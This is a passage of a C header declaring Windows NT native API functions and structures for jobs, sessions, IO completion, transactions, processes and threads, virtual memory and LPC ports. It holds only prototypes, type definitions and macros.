NTSYSAPI
NTSTATUS
NTAPI
NtSetInformationJobObject(
_In_ HANDLE JobHandle,
_In_ JOBOBJECTINFOCLASS JobObjectInformationClass,
_In_reads_bytes_(JobObjectInformationLength) PVOID JobObjectInformation,
_In_ ULONG JobObjectInformationLength);
NTSYSAPI
NTSTATUS
NTAPI
NtTerminateJobObject(
_In_ HANDLE JobHandle,
_In_ NTSTATUS ExitStatus);
/************************************************************************************
*
* Session API.
*
************************************************************************************/
typedef struct _SESSION_OBJECT {
KEVENT Event;
PVOID SessionGlobal; //MM_SESSION_SPACE ptr
} SESSION_OBJECT, * PSESSION_OBJECT;
//taken from ph2
typedef enum _IO_SESSION_EVENT {
IoSessionEventIgnore,
IoSessionEventCreated,
IoSessionEventTerminated,
IoSessionEventConnected,
IoSessionEventDisconnected,
IoSessionEventLogon,
IoSessionEventLogoff,
IoSessionEventMax
} IO_SESSION_EVENT;
typedef enum _IO_SESSION_STATE {
IoSessionStateCreated = 1,
IoSessionStateInitialized,
IoSessionStateConnected,
IoSessionStateDisconnected,
IoSessionStateDisconnectedLoggedOn,
IoSessionStateLoggedOn,
IoSessionStateLoggedOff,
IoSessionStateTerminated,
IoSessionStateMax
} IO_SESSION_STATE;
NTSYSAPI
NTSTATUS
NTAPI
NtOpenSession(
_Out_ PHANDLE SessionHandle,
_In_ ACCESS_MASK DesiredAccess,
_In_ POBJECT_ATTRIBUTES ObjectAttributes);
NTSYSAPI
NTSTATUS
NTAPI
NtNotifyChangeSession(
_In_ HANDLE SessionHandle,
_In_ ULONG ChangeSequenceNumber,
_In_ PLARGE_INTEGER ChangeTimeStamp,
_In_ IO_SESSION_EVENT Event,
_In_ IO_SESSION_STATE NewState,
_In_ IO_SESSION_STATE PreviousState,
_In_reads_bytes_opt_(PayloadSize) PVOID Payload,
_In_ ULONG PayloadSize);
/************************************************************************************
*
* IO Completion API.
*
************************************************************************************/
typedef enum _IO_COMPLETION_INFORMATION_CLASS {
IoCompletionBasicInformation
} IO_COMPLETION_INFORMATION_CLASS;
typedef struct _IO_COMPLETION_BASIC_INFORMATION {
LONG Depth;
} IO_COMPLETION_BASIC_INFORMATION, *PIO_COMPLETION_BASIC_INFORMATION;
NTSYSAPI
NTSTATUS
NTAPI
NtCreateIoCompletion(
_Out_ PHANDLE IoCompletionHandle,
_In_ ACCESS_MASK DesiredAccess,
_In_opt_ POBJECT_ATTRIBUTES ObjectAttributes,
_In_ ULONG Count);
NTSYSAPI
NTSTATUS
NTAPI
NtOpenIoCompletion(
_Out_ PHANDLE IoCompletionHandle,
_In_ ACCESS_MASK DesiredAccess,
_In_ POBJECT_ATTRIBUTES ObjectAttributes);
NTSYSAPI
NTSTATUS
NTAPI
NtQueryIoCompletion(
_In_ HANDLE IoCompletionHandle,
_In_ IO_COMPLETION_INFORMATION_CLASS IoCompletionInformationClass,
_Out_writes_bytes_(IoCompletionInformationLength) PVOID IoCompletionInformation,
_In_ ULONG IoCompletionInformationLength,
_Out_opt_ PULONG ReturnLength);
NTSYSAPI
NTSTATUS
NTAPI
NtSetIoCompletion(
_In_ HANDLE IoCompletionHandle,
_In_opt_ PVOID KeyContext,
_In_opt_ PVOID ApcContext,
_In_ NTSTATUS IoStatus,
_In_ ULONG_PTR IoStatusInformation);
NTSYSAPI
NTSTATUS
NTAPI
NtSetIoCompletionEx(
_In_ HANDLE IoCompletionHandle,
_In_ HANDLE IoCompletionPacketHandle,
_In_opt_ PVOID KeyContext,
_In_opt_ PVOID ApcContext,
_In_ NTSTATUS IoStatus,
_In_ ULONG_PTR IoStatusInformation);
NTSYSAPI
NTSTATUS
NTAPI
NtRemoveIoCompletion(
_In_ HANDLE IoCompletionHandle,
_Out_ PVOID *KeyContext,
_Out_ PVOID *ApcContext,
_Out_ PIO_STATUS_BLOCK IoStatusBlock,
_In_opt_ PLARGE_INTEGER Timeout);
/************************************************************************************
*
* Transactions API.
*
************************************************************************************/
//TmTx
NTSYSAPI
NTSTATUS
NTAPI
NtCreateTransaction(
_Out_ PHANDLE TransactionHandle,
_In_ ACCESS_MASK DesiredAccess,
_In_opt_ POBJECT_ATTRIBUTES ObjectAttributes,
_In_opt_ LPGUID Uow,
_In_opt_ HANDLE TmHandle,
_In_ ULONG CreateOptions,
_In_ ULONG IsolationLevel,
_In_ ULONG IsolationFlags,
_In_opt_ PLARGE_INTEGER Timeout,
_In_opt_ PUNICODE_STRING Description);
NTSYSAPI
NTSTATUS
NTAPI
NtOpenTransaction(
_Out_ PHANDLE TransactionHandle,
_In_ ACCESS_MASK DesiredAccess,
_In_opt_ POBJECT_ATTRIBUTES ObjectAttributes,
_In_opt_ LPGUID Uow,
_In_opt_ HANDLE TmHandle);
NTSYSAPI
NTSTATUS
NTAPI
NtRollbackTransaction(
_In_ HANDLE TransactionHandle,
_In_ BOOLEAN Wait);
NTSYSAPI
NTSTATUS
NTAPI
NtCommitTransaction(
_In_ HANDLE TransactionHandle,
_In_ BOOLEAN Wait);
NTSYSAPI
NTSTATUS
NTAPI
NtFreezeTransactions(
_In_ PLARGE_INTEGER FreezeTimeout,
_In_ PLARGE_INTEGER ThawTimeout);
NTSYSAPI
NTSTATUS
NTAPI
NtThawTransactions(
VOID);
//TmRm
NTSYSAPI
NTSTATUS
NTAPI
NtCreateResourceManager(
_Out_ PHANDLE ResourceManagerHandle,
_In_ ACCESS_MASK DesiredAccess,
_In_ HANDLE TmHandle,
_In_opt_ LPGUID ResourceManagerGuid,
_In_opt_ POBJECT_ATTRIBUTES ObjectAttributes,
_In_ ULONG CreateOptions,
_In_opt_ PUNICODE_STRING Description);
NTSYSAPI
NTSTATUS
NTAPI
NtOpenResourceManager(
_Out_ PHANDLE ResourceManagerHandle,
_In_ ACCESS_MASK DesiredAccess,
_In_ HANDLE TmHandle,
_In_opt_ LPGUID ResourceManagerGuid,
_In_opt_ POBJECT_ATTRIBUTES ObjectAttributes);
//TmEn
NTSYSAPI
NTSTATUS
NTAPI
NtCreateEnlistment(
_Out_ PHANDLE EnlistmentHandle,
_In_ ACCESS_MASK DesiredAccess,
_In_ HANDLE ResourceManagerHandle,
_In_ HANDLE TransactionHandle,
_In_opt_ POBJECT_ATTRIBUTES ObjectAttributes,
_In_opt_ ULONG CreateOptions,
_In_ NOTIFICATION_MASK NotificationMask,
_In_opt_ PVOID EnlistmentKey);
NTSYSAPI
NTSTATUS
NTAPI
NtOpenEnlistment(
_Out_ PHANDLE EnlistmentHandle,
_In_ ACCESS_MASK DesiredAccess,
_In_ HANDLE ResourceManagerHandle,
_In_ LPGUID EnlistmentGuid,
_In_opt_ POBJECT_ATTRIBUTES ObjectAttributes);
//TmTm
NTSYSAPI
NTSTATUS
NTAPI
NtCreateTransactionManager(
_Out_ PHANDLE TmHandle,
_In_ ACCESS_MASK DesiredAccess,
_In_opt_ POBJECT_ATTRIBUTES ObjectAttributes,
_In_opt_ PUNICODE_STRING LogFileName,
_In_ ULONG CreateOptions,
_In_ ULONG CommitStrength);
NTSYSAPI
NTSTATUS
NTAPI
NtOpenTransactionManager(
_Out_ PHANDLE TmHandle,
_In_ ACCESS_MASK DesiredAccess,
_In_opt_ POBJECT_ATTRIBUTES ObjectAttributes,
_In_opt_ PUNICODE_STRING LogFileName,
_In_opt_ LPGUID TmIdentity,
_In_ ULONG OpenOptions);
/************************************************************************************
*
* Performance Counter.
*
************************************************************************************/
NTSYSAPI
NTSTATUS
NTAPI
NtQueryPerformanceCounter(
_Out_ PLARGE_INTEGER PerformanceCounter,
_Out_opt_ PLARGE_INTEGER PerformanceFrequency);
NTSYSAPI
NTSTATUS
NTAPI
NtConvertBetweenAuxiliaryCounterAndPerformanceCounter(
_In_ BOOLEAN ConvertAuxiliaryToPerformanceCounter,
_In_ PLARGE_INTEGER PerformanceOrAuxiliaryCounterValue,
_Out_ PLARGE_INTEGER ConvertedValue,
_Out_opt_ PLARGE_INTEGER ConversionError);
/************************************************************************************
*
* Process and Thread API.
*
************************************************************************************/
typedef struct _INITIAL_TEB
{
struct
{
PVOID OldStackBase;
PVOID OldStackLimit;
} OldInitialTeb;
PVOID StackBase;
PVOID StackLimit;
PVOID StackAllocationBase;
} INITIAL_TEB, * PINITIAL_TEB;
#define PROCESS_GET_NEXT_FLAGS_PREVIOUS_PROCESS 0x00000001
#define QUEUE_USER_APC_FLAGS_NONE 0
#define QUEUE_USER_APC_FLAGS_SPECIAL_USER_APC 1
//
// NtCreateProcessEx specific flags.
//
#define PS_REQUEST_BREAKAWAY 1
#define PS_NO_DEBUG_INHERIT 2
#define PS_INHERIT_HANDLES 4
#define PS_LARGE_PAGES 8
#define PS_ALL_FLAGS (PS_REQUEST_BREAKAWAY | \
PS_NO_DEBUG_INHERIT | \
PS_INHERIT_HANDLES | \
PS_LARGE_PAGES)
NTSYSAPI
NTSTATUS
NTAPI
NtGetNextProcess(
_In_opt_ HANDLE ProcessHandle,
_In_ ACCESS_MASK DesiredAccess,
_In_ ULONG HandleAttributes,
_In_ ULONG Flags,
_Out_ PHANDLE NewProcessHandle);
NTSYSAPI
NTSTATUS
NTAPI
NtGetNextThread(
_In_ HANDLE ProcessHandle,
_In_ HANDLE ThreadHandle,
_In_ ACCESS_MASK DesiredAccess,
_In_ ULONG HandleAttributes,
_In_ ULONG Flags,
_Out_ PHANDLE NewThreadHandle);
NTSYSAPI
NTSTATUS
NTAPI
NtCreateProcess(
_Out_ PHANDLE ProcessHandle,
_In_ ACCESS_MASK DesiredAccess,
_In_opt_ POBJECT_ATTRIBUTES ObjectAttributes,
_In_ HANDLE ParentProcess,
_In_ BOOLEAN InheritObjectTable,
_In_opt_ HANDLE SectionHandle,
_In_opt_ HANDLE DebugPort,
_In_opt_ HANDLE ExceptionPort);
NTSYSAPI
NTSTATUS
NTAPI
NtCreateProcessEx(
_Out_ PHANDLE ProcessHandle,
_In_ ACCESS_MASK DesiredAccess,
_In_opt_ POBJECT_ATTRIBUTES ObjectAttributes,
_In_ HANDLE ParentProcess,
_In_ ULONG Flags,
_In_opt_ HANDLE SectionHandle,
_In_opt_ HANDLE DebugPort,
_In_opt_ HANDLE ExceptionPort,
_In_ BOOLEAN InJob);
NTSYSAPI
NTSTATUS
NTAPI
NtCreateUserProcess(
_Out_ PHANDLE ProcessHandle,
_Out_ PHANDLE ThreadHandle,
_In_ ACCESS_MASK ProcessDesiredAccess,
_In_ ACCESS_MASK ThreadDesiredAccess,
_In_opt_ POBJECT_ATTRIBUTES ProcessObjectAttributes,
_In_opt_ POBJECT_ATTRIBUTES ThreadObjectAttributes,
_In_ ULONG ProcessFlags,
_In_ ULONG ThreadFlags,
_In_opt_ PVOID ProcessParameters,
_Inout_ PPS_CREATE_INFO CreateInfo,
_In_opt_ PPS_ATTRIBUTE_LIST AttributeList);
NTSYSAPI
NTSTATUS
NTAPI
NtCreateThread(
_Out_ PHANDLE ThreadHandle,
_In_ ACCESS_MASK DesiredAccess,
_In_opt_ POBJECT_ATTRIBUTES ObjectAttributes,
_In_ HANDLE ProcessHandle,
_Out_ PCLIENT_ID ClientId,
_In_ PCONTEXT ThreadContext,
_In_ PINITIAL_TEB InitialTeb,
_In_ BOOLEAN CreateSuspended);
NTSYSAPI
NTSTATUS
NTAPI
NtCreateThreadEx(
_Out_ PHANDLE ThreadHandle,
_In_ ACCESS_MASK DesiredAccess,
_In_opt_ POBJECT_ATTRIBUTES ObjectAttributes,
_In_ HANDLE ProcessHandle,
_In_ PVOID StartRoutine,
_In_opt_ PVOID Argument,
_In_ ULONG CreateFlags, //THREAD_CREATE_FLAGS_*
_In_opt_ ULONG_PTR ZeroBits,
_In_opt_ SIZE_T StackSize,
_In_opt_ SIZE_T MaximumStackSize,
_In_opt_ PPS_ATTRIBUTE_LIST AttributeList);
NTSYSAPI
NTSTATUS
NTAPI
NtOpenProcess(
_Out_ PHANDLE ProcessHandle,
_In_ ACCESS_MASK DesiredAccess,
_In_ POBJECT_ATTRIBUTES ObjectAttributes,
_In_opt_ PCLIENT_ID ClientId);
NTSYSAPI
NTSTATUS
NTAPI
NtTerminateProcess(
_In_opt_ HANDLE ProcessHandle,
_In_ NTSTATUS ExitStatus);
NTSYSAPI
NTSTATUS
NTAPI
NtSuspendProcess(
_In_ HANDLE ProcessHandle);
NTSYSAPI
NTSTATUS
NTAPI
NtResumeProcess(
_In_ HANDLE ProcessHandle);
NTSYSAPI
NTSTATUS
NTAPI
NtCreateProcessStateChange(
_Out_ PHANDLE ProcessStateChangeHandle,
_In_ ACCESS_MASK DesiredAccess,
_In_opt_ POBJECT_ATTRIBUTES ObjectAttributes,
_In_ HANDLE ProcessHandle,
_In_opt_ ULONG64 Reserved);
NTSYSAPI
NTSTATUS
NTAPI
NtChangeProcessState(
_In_ HANDLE ProcessStateChangeHandle,
_In_ HANDLE ProcessHandle,
_In_ PROCESS_STATE_CHANGE_TYPE StateChangeType,
_In_opt_ PVOID ExtendedInformation,
_In_opt_ SIZE_T ExtendedInformationLength,
_In_opt_ ULONG64 Reserved);
NTSYSAPI
NTSTATUS
NTAPI
NtSuspendThread(
_In_ HANDLE ThreadHandle,
_Out_opt_ PULONG PreviousSuspendCount);
NTSYSAPI
NTSTATUS
NTAPI
NtResumeThread(
_In_ HANDLE ThreadHandle,
_Out_opt_ PULONG PreviousSuspendCount);
NTSYSAPI
NTSTATUS
NTAPI
NtCreateThreadStateChange(
_Out_ PHANDLE ThreadStateChangeHandle,
_In_ ACCESS_MASK DesiredAccess,
_In_opt_ POBJECT_ATTRIBUTES ObjectAttributes,
_In_ HANDLE ThreadHandle,
_In_opt_ ULONG64 Reserved);
NTSYSAPI
NTSTATUS
NTAPI
NtChangeThreadState(
_In_ HANDLE ThreadStateChangeHandle,
_In_ HANDLE ThreadHandle,
_In_ THREAD_STATE_CHANGE_TYPE StateChangeType,
_In_opt_ PVOID ExtendedInformation,
_In_opt_ SIZE_T ExtendedInformationLength,
_In_opt_ ULONG64 Reserved);
NTSYSAPI
NTSTATUS
NTAPI
NtOpenThread(
_Out_ PHANDLE ThreadHandle,
_In_ ACCESS_MASK DesiredAccess,
_In_ POBJECT_ATTRIBUTES ObjectAttributes,
_In_opt_ PCLIENT_ID ClientId);
NTSYSAPI
NTSTATUS
NTAPI
NtTerminateThread(
_In_opt_ HANDLE ThreadHandle,
_In_ NTSTATUS ExitStatus);
NTSYSAPI
NTSTATUS
NTAPI
NtImpersonateThread(
_In_ HANDLE ServerThreadHandle,
_In_ HANDLE ClientThreadHandle,
_In_ PSECURITY_QUALITY_OF_SERVICE SecurityQos);
NTSYSAPI
NTSTATUS
NTAPI
NtSetContextThread(
_In_ HANDLE ThreadHandle,
_In_ PCONTEXT ThreadContext);
NTSYSAPI
NTSTATUS
NTAPI
NtGetContextThread(
_In_ HANDLE ThreadHandle,
_Inout_ PCONTEXT ThreadContext);
NTSYSAPI
NTSTATUS
NTAPI
NtQueryInformationThread(
_In_ HANDLE ThreadHandle,
_In_ THREADINFOCLASS ThreadInformationClass,
_Out_writes_bytes_(ThreadInformationLength) PVOID ThreadInformation,
_In_ ULONG ThreadInformationLength,
_Out_opt_ PULONG ReturnLength);
NTSYSAPI
NTSTATUS
NTAPI
NtSetInformationThread(
_In_ HANDLE ThreadHandle,
_In_ THREADINFOCLASS ThreadInformationClass,
_In_reads_bytes_(ThreadInformationLength) PVOID ThreadInformation,
_In_ ULONG ThreadInformationLength);
NTSYSAPI
NTSTATUS
NTAPI
NtQueryInformationProcess(
_In_ HANDLE ProcessHandle,
_In_ PROCESSINFOCLASS ProcessInformationClass,
_Out_writes_bytes_(ProcessInformationLength) PVOID ProcessInformation,
_In_ ULONG ProcessInformationLength,
_Out_opt_ PULONG ReturnLength);
NTSYSAPI
NTSTATUS
NTAPI
NtSetInformationProcess(
_In_ HANDLE ProcessHandle,
_In_ PROCESSINFOCLASS ProcessInformationClass,
_In_reads_bytes_(ProcessInformationLength) PVOID ProcessInformation,
_In_ ULONG ProcessInformationLength);
typedef VOID(*PPS_APC_ROUTINE) (
_In_opt_ PVOID ApcArgument1,
_In_opt_ PVOID ApcArgument2,
_In_opt_ PVOID ApcArgument3);
NTSYSAPI
NTSTATUS
NTAPI
NtQueueApcThread(
_In_ HANDLE ThreadHandle,
_In_ PPS_APC_ROUTINE ApcRoutine,
_In_opt_ PVOID ApcArgument1,
_In_opt_ PVOID ApcArgument2,
_In_opt_ PVOID ApcArgument3);
NTSYSAPI
NTSTATUS
NTAPI
NtQueueApcThreadEx(
_In_ HANDLE ThreadHandle,
_In_opt_ HANDLE ReserveHandle,
_In_ PPS_APC_ROUTINE ApcRoutine,
_In_opt_ PVOID ApcArgument1,
_In_opt_ PVOID ApcArgument2,
_In_opt_ PVOID ApcArgument3);
NTSYSAPI
NTSTATUS
NTAPI
NtQueueApcThreadEx2(
_In_ HANDLE ThreadHandle,
_In_ HANDLE UserApcReserveHandle,
_In_ ULONG QueueUserApcFlags, /*QUEUE_USER_APC_FLAGS*/
_In_ PPS_APC_ROUTINE ApcRoutine,
_In_opt_ PVOID SystemArgument1,
_In_opt_ PVOID SystemArgument2,
_In_opt_ PVOID SystemArgument3);
NTSYSAPI
NTSTATUS
NTAPI
NtYieldExecution(
VOID);
NTSYSAPI
NTSTATUS
NTAPI
NtTestAlert(
VOID);
NTSYSAPI
NTSTATUS
NTAPI
NtAlertThread(
_In_ HANDLE ThreadHandle);
NTSYSAPI
NTSTATUS
NTAPI
NtAlertResumeThread(
_In_ HANDLE ThreadHandle,
_Out_opt_ PULONG PreviousSuspendCount);
NTSYSAPI
NTSTATUS
NTAPI
NtAlertThreadByThreadId(
_In_ HANDLE ThreadId);
NTSYSAPI
NTSTATUS
NTAPI
NtWaitForAlertByThreadId(
_In_ PVOID Address,
_In_opt_ PLARGE_INTEGER Timeout);
NTSYSAPI
NTSTATUS
NTAPI
NtDelayExecution(
_In_ BOOLEAN Alertable,
_In_opt_ PLARGE_INTEGER DelayInterval);
NTSYSAPI
ULONG
NTAPI
NtGetCurrentProcessorNumber(
VOID);
/************************************************************************************
*
* License API.
*
************************************************************************************/
NTSYSAPI
NTSTATUS
NTAPI
NtQueryLicenseValue(
_In_ PUNICODE_STRING ValueName,
_Out_opt_ PULONG Type,
_Out_writes_bytes_to_opt_(DataSize, *ResultDataSize) PVOID Data,
_In_ ULONG DataSize,
_Out_ PULONG ResultDataSize);
/************************************************************************************
*
* Virtual Memory API.
*
************************************************************************************/
NTSYSAPI
NTSTATUS
NTAPI
NtAllocateVirtualMemory(
_In_ HANDLE ProcessHandle,
_Inout_ _At_(*BaseAddress, _Readable_bytes_(*RegionSize) _Writable_bytes_(*RegionSize) _Post_readable_byte_size_(*RegionSize)) PVOID *BaseAddress,
_In_ ULONG_PTR ZeroBits,
_Inout_ PSIZE_T RegionSize,
_In_ ULONG AllocationType,
_In_ ULONG Protect);
NTSYSAPI
NTSTATUS
NTAPI
NtAllocateVirtualMemoryEx(
_In_ HANDLE ProcessHandle,
_Inout_ _At_(*BaseAddress, _Readable_bytes_(*RegionSize) _Writable_bytes_(*RegionSize) _Post_readable_byte_size_(*RegionSize)) PVOID* BaseAddress,
_Inout_ PSIZE_T RegionSize,
_In_ ULONG AllocationType,
_In_ ULONG PageProtection,
_Inout_updates_opt_(ExtendedParameterCount) PMEM_EXTENDED_PARAMETER ExtendedParameters,
_In_ ULONG ExtendedParameterCount);
NTSYSAPI
NTSTATUS
NTAPI
NtFreeVirtualMemory(
_In_ HANDLE ProcessHandle,
_Inout_ PVOID *BaseAddress,
_Inout_ PSIZE_T RegionSize,
_In_ ULONG FreeType);
NTSYSAPI
NTSTATUS
NTAPI
NtQueryVirtualMemory(
_In_ HANDLE ProcessHandle,
_In_opt_ PVOID BaseAddress,
_In_ MEMORY_INFORMATION_CLASS MemoryInformationClass,
_Out_writes_bytes_(MemoryInformationLength) PVOID MemoryInformation,
_In_ SIZE_T MemoryInformationLength,
_Out_opt_ PSIZE_T ReturnLength);
NTSYSAPI
NTSTATUS
NTAPI
NtSetInformationVirtualMemory(
_In_ HANDLE ProcessHandle,
_In_ VIRTUAL_MEMORY_INFORMATION_CLASS VmInformationClass,
_In_ ULONG_PTR NumberOfEntries,
_In_reads_(NumberOfEntries) PMEMORY_RANGE_ENTRY VirtualAddresses,
_In_reads_bytes_(VmInformationLength) PVOID VmInformation,
_In_ ULONG VmInformationLength);
NTSYSAPI
NTSTATUS
NTAPI
NtReadVirtualMemory(
_In_ HANDLE ProcessHandle,
_In_opt_ PVOID BaseAddress,
_Out_writes_bytes_(BufferSize) PVOID Buffer,
_In_ SIZE_T BufferSize,
_Out_opt_ PSIZE_T NumberOfBytesRead);
NTSYSAPI
NTSTATUS
NTAPI
NtReadVirtualMemoryEx(
_In_ HANDLE ProcessHandle,
_In_opt_ PVOID BaseAddress,
_Out_writes_bytes_(BufferSize) PVOID Buffer,
_In_ SIZE_T BufferSize,
_Out_opt_ PSIZE_T NumberOfBytesRead,
_In_ ULONG Flags);
NTSYSAPI
NTSTATUS
NTAPI
NtWriteVirtualMemory(
_In_ HANDLE ProcessHandle,
_In_opt_ PVOID BaseAddress,
_In_reads_bytes_(BufferSize) PVOID Buffer,
_In_ SIZE_T BufferSize,
_Out_opt_ PSIZE_T NumberOfBytesWritten);
NTSYSAPI
NTSTATUS
NTAPI
NtProtectVirtualMemory(
_In_ HANDLE ProcessHandle,
_Inout_ PVOID *BaseAddress,
_Inout_ PSIZE_T RegionSize,
_In_ ULONG NewProtect,
_Out_ PULONG OldProtect);
#define MAP_PROCESS 1L
#define MAP_SYSTEM 2L
NTSYSAPI
NTSTATUS
NTAPI
NtLockVirtualMemory(
_In_ HANDLE ProcessHandle,
_Inout_ PVOID *BaseAddress,
_Inout_ PSIZE_T RegionSize,
_In_ ULONG MapType);
NTSYSAPI
NTSTATUS
NTAPI
NtUnlockVirtualMemory(
_In_ HANDLE ProcessHandle,
_Inout_ PVOID *BaseAddress,
_Inout_ PSIZE_T RegionSize,
_In_ ULONG MapType);
NTSTATUS
NTAPI
NtFlushVirtualMemory(
_In_ HANDLE ProcessHandle,
_Inout_ PVOID* BaseAddress,
_Inout_ PSIZE_T RegionSize,
_Out_ struct _IO_STATUS_BLOCK* IoStatus);
NTSYSAPI
NTSTATUS
NTAPI
NtFlushInstructionCache(
_In_ HANDLE ProcessHandle,
_In_opt_ PVOID BaseAddress,
_In_ SIZE_T Length);
NTSYSAPI
NTSTATUS
NTAPI
NtCreatePagingFile(
_In_ PUNICODE_STRING PageFileName,
_In_ PLARGE_INTEGER MinimumSize,
_In_ PLARGE_INTEGER MaximumSize,
_In_ ULONG Priority);
/************************************************************************************
*
* Port API.
*
************************************************************************************/
typedef struct _PORT_VIEW {
ULONG Length; // Size of this structure
HANDLE SectionHandle; // Handle to section object with
// SECTION_MAP_WRITE and SECTION_MAP_READ
ULONG SectionOffset; // The offset in the section to map a view for
// the port data area. The offset must be aligned
// with the allocation granularity of the system.
SIZE_T ViewSize; // The size of the view (in bytes)
PVOID ViewBase; // The base address of the view in the creator
//
PVOID ViewRemoteBase; // The base address of the view in the process
// connected to the port.
} PORT_VIEW, * PPORT_VIEW;
typedef struct _REMOTE_PORT_VIEW {
ULONG Length; // Size of this structure
SIZE_T ViewSize; // The size of the view (bytes)
PVOID ViewBase; // Base address of the view
} REMOTE_PORT_VIEW, * PREMOTE_PORT_VIEW;
typedef struct _PORT_MESSAGE {
union {
struct {
CSHORT DataLength;
CSHORT TotalLength;
} s1;
ULONG Length;
} u1;
union {
struct {
CSHORT Type;
CSHORT DataInfoOffset;
} s2;
ULONG ZeroInit;
} u2;
union {
CLIENT_ID ClientId;
double DoNotUseThisField; // Force quadword alignment
} u3;
ULONG MessageId;
union {
SIZE_T ClientViewSize; // Only valid on LPC_CONNECTION_REQUEST message
ULONG CallbackId; // Only valid on LPC_REQUEST message
} u4;
} PORT_MESSAGE, *PPORT_MESSAGE;
typedef struct _PORT_MESSAGE32 {
union {
struct {
CSHORT DataLength;
CSHORT TotalLength;
} s1;
ULONG Length;
} u1;
union {
struct {
CSHORT Type;
CSHORT DataInfoOffset;
} s2;
ULONG ZeroInit;
} u2;
union {
CLIENT_ID32 ClientId;
double DoNotUseThisField; // Force quadword alignment
} u3;
ULONG MessageId;
union {
ULONG ClientViewSize; // Only valid on LPC_CONNECTION_REQUEST message
ULONG CallbackId; // Only valid on LPC_REQUEST message
} u4;
} PORT_MESSAGE32, * PPORT_MESSAGE32;
typedef struct _PORT_MESSAGE64
{
union
{
struct
{
CSHORT DataLength;
CSHORT TotalLength;
} s1;
ULONG Length;
} u1;
union
{
struct
{
CSHORT Type;
CSHORT DataInfoOffset;
} s2;
ULONG ZeroInit;
} u2;
union
{
CLIENT_ID64 ClientId;
double DoNotUseThisField;
};
ULONG MessageId;
union
{
ULONGLONG ClientViewSize; // only valid for LPC_CONNECTION_REQUEST messages
ULONG CallbackId; // only valid for LPC_REQUEST messages
};
} PORT_MESSAGE64, * PPORT_MESSAGE64;
typedef struct _PORT_DATA_ENTRY {
PVOID Base;
ULONG Size;
} PORT_DATA_ENTRY, *PPORT_DATA_ENTRY;
typedef struct _PORT_DATA_INFORMATION {
ULONG CountDataEntries;
PORT_DATA_ENTRY DataEntries[1];
} PORT_DATA_INFORMATION, *PPORT_DATA_INFORMATION;
#ifndef InitializeMessageHeader
#define InitializeMessageHeader(ph, l, t) \
{ \
(ph)->u1.s1.TotalLength = (USHORT)(l); \
(ph)->u1.s1.DataLength = (USHORT)(l - sizeof(PORT_MESSAGE)); \
(ph)->u2.s2.Type = (USHORT)(t); \
(ph)->u2.s2.DataInfoOffset = 0; \
(ph)->ClientId.UniqueProcess = NULL; \
(ph)->ClientId.UniqueThread = NULL; \
(ph)->MessageId = 0; \
(ph)->ClientViewSize = 0; \
}
#endif
#define LPC_REQUEST 1
#define LPC_REPLY 2
#define LPC_DATAGRAM 3
#define LPC_LOST_REPLY 4
#define LPC_PORT_CLOSED 5
#define LPC_CLIENT_DIED 6
#define LPC_EXCEPTION 7
#define LPC_DEBUG_EVENT 8
#define LPC_ERROR_EVENT 9
#define LPC_CONNECTION_REQUEST 10
#define LPC_CONTINUATION_REQUIRED 0x2000
#define PORT_VALID_OBJECT_ATTRIBUTES (OBJ_CASE_INSENSITIVE)
#define PORT_MAXIMUM_MESSAGE_LENGTH 256
typedef struct _LPC_CLIENT_DIED_MSG {
PORT_MESSAGE PortMsg;
LARGE_INTEGER CreateTime;
} LPC_CLIENT_DIED_MSG, *PLPC_CLIENT_DIED_MSG;
NTSYSAPI
NTSTATUS
NTAPI
NtCreatePort(
_Out_ PHANDLE PortHandle,
_In_ POBJECT_ATTRIBUTES ObjectAttributes,
_In_ ULONG MaxConnectionInfoLength,
_In_ ULONG MaxMessageLength,
_In_ ULONG MaxPoolUsage);
NTSYSAPI
NTSTATUS
NTAPI
NtCompleteConnectPort(
_In_ HANDLE PortHandle);
NTSYSAPI
NTSTATUS
NTAPI
NtListenPort(
_In_ HANDLE PortHandle,
_Out_ PPORT_MESSAGE ConnectionRequest);
NTSYSAPI
NTSTATUS
NTAPI
NtReplyPort(
_In_ HANDLE PortHandle,
_In_ PPORT_MESSAGE ReplyMessage);
NTSYSAPI
NTSTATUS
NTAPI
NtReplyWaitReplyPort(
_In_ HANDLE PortHandle,
_Inout_ PPORT_MESSAGE ReplyMessage);
NTSYSAPI
NTSTATUS
NTAPI
NtRequestPort(
_In_ HANDLE PortHandle,
_In_ PPORT_MESSAGE RequestMessage);
NTSYSAPI
NTSTATUS
NTAPI
NtRequestWaitReplyPort(
_In_ HANDLE PortHandle,
_In_ PPORT_MESSAGE RequestMessage,
_Out_ PPORT_MESSAGE ReplyMessage);
NTSYSAPI
NTSTATUS
NTAPI
NtClosePort(
_In_ HANDLE PortHandle);
NTSYSAPI
NTSTATUS
NTAPI
NtReplyWaitReceivePort(
_In_ HANDLE PortHandle,
_Out_opt_ PVOID *PortContext,
_In_opt_ PPORT_MESSAGE ReplyMessage,
_Out_ PPORT_MESSAGE ReceiveMessage);
NTSYSAPI
NTSTATUS
NTAPI
NtWriteRequestData(
_In_ HANDLE PortHandle,
_In_ PPORT_MESSAGE Message,
_In_ ULONG DataEntryIndex,
_In_ PVOID Buffer,
_In_ ULONG BufferSize,
_Out_opt_ PULONG NumberOfBytesWritten);
NTSYSAPI
NTSTATUS
NTAPI
NtReadRequestData(
_In_ HANDLE PortHandle,
_In_ PPORT_MESSAGE Message,
_In_ ULONG DataEntryIndex,
_Out_ PVOID Buffer,
_In_ ULONG BufferSize,
_Out_opt_ PULONG NumberOfBytesRead);
NTSYSAPI
NTSTATUS
NTAPI
NtConnectPort(
_Out_ PHANDLE PortHandle,
_In_ PUNICODE_STRING PortName,
_In_ PSECURITY_QUALITY_OF_SERVICE SecurityQos,
_Inout_opt_ PPORT_VIEW ClientView,
_Out_opt_ PREMOTE_PORT_VIEW ServerView,
_Out_opt_ PULONG MaxMessageLength,
_Inout_opt_ PVOID ConnectionInformation,
_Inout_opt_ PULONG ConnectionInformationLength);
NTSYSAPI
NTSTATUS
NTAPI
NtAcceptConnectPort(
_Out_ PHANDLE PortHandle,
_In_opt_ PVOID PortContext,
_In_ PPORT_MESSAGE ConnectionRequest,
_In_ BOOLEAN AcceptConnection,
_Inout_opt_ PPORT_VIEW ServerView,
_Out_opt_ PREMOTE_PORT_VIEW ClientView);
NTSYSAPI
NTSTATUS
NTAPI
NtSecureConnectPort(
_Out_ PHANDLE PortHandle,
_In_ PUNICODE_STRING PortName,
_In_ PSECURITY_QUALITY_OF_SERVICE SecurityQos,
_Inout_opt_ PPORT_VIEW ClientView,
_In_opt_ PSID RequiredServerSid,
_Inout_opt_ PREMOTE_PORT_VIEW ServerView,
_Out_opt_ PULONG MaxMessageLength,
